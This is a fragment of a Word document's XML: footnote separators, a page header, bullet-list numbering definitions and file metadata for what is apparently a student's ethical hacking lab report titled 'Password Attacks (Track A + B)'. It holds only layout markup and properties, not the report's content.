        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0093736C" w:rsidRDefault="00937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4680" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="DDDDDD"/>
      </w:pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>EGR6301 — Етичний хакінг — Лабораторна робота №8 — IITU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87C9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7AD0E782"/>
    <w:lvl w:ilvl="0" w:tplc="ED22E170">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0A5CC092">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3D28811E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C34E0CAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DAEAE378">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="1EF04D0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="64EC0AE6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="884A1A64">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C838ACF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1512405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80"/>
    <w:rsid w:val="00260C44"/>
    <w:rsid w:val="005E1E58"/>
    <w:rsid w:val="0093736C"/>
    <w:rsid w:val="0096100D"/>
    <w:rsid w:val="00F1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BA114D"/>
  <w15:docId w15:val="{5C6F14BD-8C82-A74D-AB55-A8505407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3259</Words>
  <Characters>18580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8 — Password Attacks (Track A + B)</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>21796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8 — Password Attacks (Track A + B)</dc:title>
  <dc:creator>Dmytro Bilozor</dc:creator>
  <dc:description>EGR6301 Ethical Hacking Lab 8</dc:description>
  <cp:lastModifiedBy>Dima Bil</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-01T08:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-01T09:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>